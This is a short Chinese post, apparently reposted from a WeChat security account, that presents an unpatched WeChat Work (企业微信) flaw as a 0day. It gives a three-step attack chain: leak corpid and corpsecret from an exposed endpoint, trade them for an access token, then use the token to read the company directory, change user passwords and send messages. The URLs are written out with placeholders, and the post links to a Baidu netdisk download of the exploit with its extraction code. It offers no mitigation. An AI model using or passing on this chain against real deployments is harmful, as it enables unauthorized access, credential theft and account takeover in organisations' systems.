漏洞详情分析:
第一步:,通过泄露信息接口可以获取corpid和corpsecret
https://<企业微信域名>/cgi-bin/gateway/agentinfo
第二步,使用corpsecret和corpid获得token
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
第三步,使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口
https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
exp:
【超级会员V2】通过百度网盘分享的文件:企业微信管理员信…
链接:https://pan.baidu.com/s/1zw3zhO3ZnyEwVR3t8LdSDg?pwd=qj5s
提取码:qj5s
复制这段内容打开「百度网盘APP 即可获取」
原文始发于微信公众号(YNsec安全实验室):企业微信0day,附exp
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论